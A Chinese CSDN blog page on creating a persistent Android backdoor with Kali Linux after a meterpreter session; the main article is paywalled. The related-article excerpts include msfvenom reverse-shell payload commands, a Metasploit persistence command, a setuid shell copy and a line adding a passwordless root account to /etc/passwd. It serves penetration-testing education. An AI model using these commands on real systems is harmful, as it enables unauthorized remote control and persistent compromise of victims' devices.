在Android中使用带有shell脚本的Kali Linux的持久性后门

于 2024-03-23 21:36:16 发布
阅读量1k 收藏 12
点赞数 14
CC 4.0 BY-SA版权
文章标签: android linux web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/HTTPPTTH/article/details/136975820

本内容主要介绍如何在使用msfvenom进行黑客攻击后,利用 Kali Linux 在 Android 设备中创建持久性后门。

可以使用上述任何一种方法来破解 android 设备,但是一旦获得了meterpreter会话,该会话就不是持久的,要使其持久,需要将一个 shell 脚本上传到/sdcard目录的任何位置。

在破解 Android 设备时,可以使用多种方法,但是一旦获得了meterpreter会话,该会话并不是持久的,需要将一个 shell 脚本上传到/sdcard目录的任何位置来实现持久性后门。由于受害者的设备一般没有 root 权限,因此不能在/etc/init.d目录下创建任何文件,权限太少。因此,我们需要使用另一种方法,即使用shell命令在/sdcard目录下上传一个后门,并执行脚本,该脚本会自动在该 Android 设备中创建持久性后门。

以下是需要遵循的步骤:

最低0.47元/天 解锁文章

200万优质内容无限畅学
夏瞳_
关注
windows/android后门的维持
qq_2411772106的博客
08-09 682
搭建环境:kali linux,MSF windons后门维持 // 先创建一个后门payload msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your ip> LPORT=4444 -f exe > /root/Desktop/windowsPayload.exe // 打开msf控制台,并完成相关设置 msfconsole use exploit/multi/handler set payload windows/meterpr
从实践中学习Kali Linux渗透测试
最新发布
cc123489ll的博客
06-19 913
1.1.1 黑盒测试黑盒测试(Black-box Testing)也称为外部测试(ExternalTesting)。采用这种方式,测试者将从一个远程网络位置评估目标网络基础设施,并没有任何目标网络内部拓扑等相关信息。完全模拟真实网络环境中的外部攻击者,采用流行技术与工具有组织、有步骤的对目标组织进行渗透和入侵,揭示目标网络中一些已知或未知的安全漏洞,并评估这些漏洞能否被利用。优点:有利于挖掘出系统潜在的漏洞,以及脆弱环节和薄弱点。缺点:测试较为费时和费力,同时需要渗透测试者具备较高的技术能力。
Kali 中 Persistence后门使用
大方子
09-02 3678
这里我就用最经典的漏洞ms08_067进行演示   靶机:192.168.193.128 攻击机:192.168.193.135   这里我就省去ms08_067漏洞的使用过程,直接讲当ms08_067拿到shell之后的操作   这里我们已经拿到权限了   然后执行 run persistence -S -U -X -i 5 -p 446 -r 192.168.193.13...
12.3、后渗透测试--持久化后门
无痕的博客
12-13 3619
metasploit后渗透测试--持久化后门
Android应用植入后门 实现msf控制(附带所需工具和常见坑解决办法)
weixin_72849553的博客
12-21 4739
本人刚入msf坑不久,对于Android的渗透比较感兴趣,于是在网上寻找了很久资料,但是发现很多实现方法都会出现各种奇怪报错,于是我花了点时间,在外面的世界找解决方案,总算实现成功,故整理文章,供正在困惑和迷茫中挣扎的小伙伴们互相交流。下面进入正题:我们的思路是对一个安卓应用注入msf生成的payload后门,并实现内网范围或是外网范围内的持续控制,这样就会实现后门随正常应用启动,但不易被发现。文中会提供一些思路拓展,如果需要,我可以再展开来讲。
linux下留本地后门的两个方法
风信子的专栏
09-19 853
刚找xiaoyu要了文中所说的test文件,另外xiaoyu也发了我一个视频,一块放上来,下载地址:test、fstab后门视频.rar。test备份地址。作者:xi4oyu方法一:setuid的方法,其实8是很隐蔽。看看过程:[root@localdomain lib]# ls -l |grep ld-linuxlrwxrwxrwx 1 root root       9 20
kali linux 支持什么编程语言_渗透过程中可能要用到的Kali工具小总结
weixin_39576066的博客
10-24 3015
渗透过程中可能要用到的Kali工具小总结写在最前面最近在搞渗透的时候,发现过程中有一些kali工具还是很适合使用的所以写一个渗透过程中可能用到的kali渗透工具的小小总结写的不对 多多包涵 各位大佬轻喷 :DKali用得好 牢饭准管饱渗透不规范 亲人两行泪先来了解一下Kali(From Wikipdeia)Kali Linux是基于Debian的Linux发行版, 设计用于数字取证操作系统。由Of...
Kali Linux中高级Android漏洞利用技巧】:专家级破解指南
[【Kali Linux中高级Android漏洞利用技巧】:专家级破解指南](https://play.vidyard.com/QV1U8a2yzcxigw7VFnqKyg.jpg) # 1. Android漏洞利用基础知识 ## 1.1 漏洞利用概述 漏洞利用(Exploitation)是指利用软件中...
Kali Linux:用永恒之蓝对 Windows 7 进行渗透并揭密勒索病毒攻击方法
GitChat
02-05 6085
提示:本文章内所有内容环境为自己搭建绝无违法内容,请不要利用其中的技术来做违法的事情。 声明:法律问题与本作者无关,请自觉遵守! 实施利用 Kali Linux 对 Windows7 SP1 进行永恒之蓝操作,所以操作将在虚拟机上完成。...
网络安全工程师教你:如何掌握Kali Linux的Metasploit
10-02
一、适合人群:本课程适合兴趣计算机与网络安全技术的学员观看学习二、课程目标:学习和掌握Kali Linux的Metasploit测试框架三、课程简介:1、Kali Linux是基于Debian的Linux发行版, 设计用于数字取证操作系统。每一季度更新一次。由Offensive Security Ltd维护和资助。起先由Offensive Security的Mati Aharoni和Devon Kearns通过重写BackTrack来完成,BackTrack是他们之前写的用于取证的Linux发行版 。 2、Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。
jackpal.androidterm_70.apk
09-20
访问 Android 内置的 Linux 命令行 shell。 受欢迎的“Android Terminal Emulator”的一个新版本。同样的程序,新的名字。 主要功能 + 完整的 Linux 终端模拟器。 + 多窗口。 + 启动器快捷显示 + 支持 UTF-8 文本。(阿拉伯语、中文、希腊语、希伯来文、日语、韩文、俄语、泰文等。) + 全免费,无广告、无内置付费项目,无烦人的屏幕。 常见问题简述: + 如果遇到输入问题,请安装免费的“Hacker's Keyboard IME”。(尤其是对于三星或 HTC 设备。) + 该应用非游戏模拟器。 + 该应用不用于获取手机 root 权限或更改手机 IMEI 码。 + 需知道(或愿意学习)通过该应用使用命令行。 + 为了使用 Android 设备内置命令之外的命令,需安装一组命令行应用,比如 Busy Box 或 Debian chroot。 + 在版本低于 5.0 的 Android 系统上安装该应用,如果出现 -505 错误,表示其他应用正在使用同样的权限。为了成功安装本应用,请先卸载这些应用。(有用户反馈称,导致该问题的原因是 jrummy's Toolbox Pro。) 想要了解更多有关 Terminal Emulator for Android 的信息? 请加入 G+ 社区:#Android Terminal Emulator https://plus.google.com/u/0/communities/106164413936367578283 或查看文档 wiki: http://github.com/jackpal/Android-Terminal-Emulator/wiki 想要参加 Terminal Emulator for Android 的翻译或校对?请访问 https://github.com/jackpal/Android-Terminal-Emulator/wiki/Translating-to-Other-Languages for instructions。
[CM311-1A]-全网最全 Android 软件管理
燃吹 U 客帮
07-25 5219
如何使用命令安装卸载应用 应用安装与应用数据的存储位置不同 查看安装后的软件信息 查看某个应用的详细信息 如何使用命令启动应用程序 获取包名和 activity 路径 使用 am 的 start 命令启动 APP 使用命令启用应用 查看包的系统状态信息 查看系统功能与支持库信息 测试包与 APK 路径查询 pm 查询包的各种信息 搜索包 安装卸载包 清除应用数据 停用/禁用/启用 以及 恢复应用 隐藏与恢复应用 查看与更改默认安装位置.....................
Android 实现数据持久化功能的三种方式
KingToAce
01-30 3542
在应用开发中,不可避免要无时无刻地和数据打交道。 为什么要实现数据持久化? 比如:对象Student中有参数name、sex、age等,在应用开发中可以创建一个Student对象并给其参数赋值,该方式用于存储暂时\瞬时的数据,当退出程序或资源被回收后所保存的数据就消失了,因此当我们开发中需要保存用户登录的账号或密码、保存用户设置等重要信息时,数据持久化就可以帮助我们实现这一需求。
android 运行shell 脚本文件或shell命令
kk3087961的博客
01-11 7460
但是通过代码运行无法安装:Process p = Runtime.getRuntime().exec("pm install -r -t /data/local/tmp/test-debug.apk");3.执行脚本文件 Runtime.getRuntime().exec("sh /sdcard/lilei/test.sh");-----------------具体实现如下--------------------------------android 运行shell 脚本文件或shell命令。
android启动时,如何执行shell脚本
ConceptCon
10-27 2585
1、假如有如下shell脚本: ethcfg.sh    vendor\xyz\etc #!/system/busybox/bin/sh #song add for network dhcp netcfg eth0 up netcfg eth0 dhcp 2、在init.rc中把脚本定义成一个服务就可以了 init.rc: service ethcfg /s
kali metasploit 制作后门程序远程操控基本使用方法
qq_51685718的博客
12-03 4402
kali metasploit制作后门程序远程操控基本使用方法 1.后门程序的制作与加密 后门的实质就是木马 msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.34.53 lport=10000 -f exe -o biyu.exe lhost后面加的是本机ip,lport后面加的是想要打开的端口号 执行后会在本地生成一个biyu.exe的文件 如果直接上传到win系统会被杀毒软件杀掉,我们可以用自己的电脑对其进行一个加壳操作。 下
LINUX后门--教程(八)—— vim+python文件后门
W小哥
08-04 1658
一、本教程作用 1、用在攻击的途径上 2、应急响应过程中,黑客会留后门,如果你连这种留后门方法都不会,怎么去应急? 不知攻,焉知防 二、vim+python文件后门-教程 前提条件: 假设在攻击的过程中通过利用各种getshell,已经拿到目标服务器root权限 靶机 IP: 192.168.241.142 (Ubuntu 20.04) 攻击IP: 192.168.241.128 (kali) 查看 Ubuntu 20.04 的 vim 支持情况: 可以得知 vim 支持 python3 注意: 如果服
linux 系统留后门方法+日志清除
收集盒 Book box
11-28 1693
1. setuid  #cp /bin/sh /tmp/.sh  #chmod u+s /tmp/.sh  加上 suid 位到shell上,虽然很简单,但容易被发现  2. echo "hack::0:0::/:/bin/csh" >> /etc/passwd  即给系统增加一个 id 为 0(root)的帐号,无口令。  但管理员很快就可以发现哦!  3.echo "
kali下生成web后门
weixin_34397291的博客
12-07 869
  很多时候在***测试时选择web***害怕用的别人的马带有后门,这样自己的辛苦就要被别人不劳而获,很多时候我们都想拥有自己的马,那么这个时候你就应该使用kail来生成一个自己独特密码的web***了。 Kali Linux带有好几个web***生成工具,下面我们来简单看几个:1.webacoo后门webacoo  -g -o test.php-g 制作后门代码-o 输出生成指定的后门程序文件...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值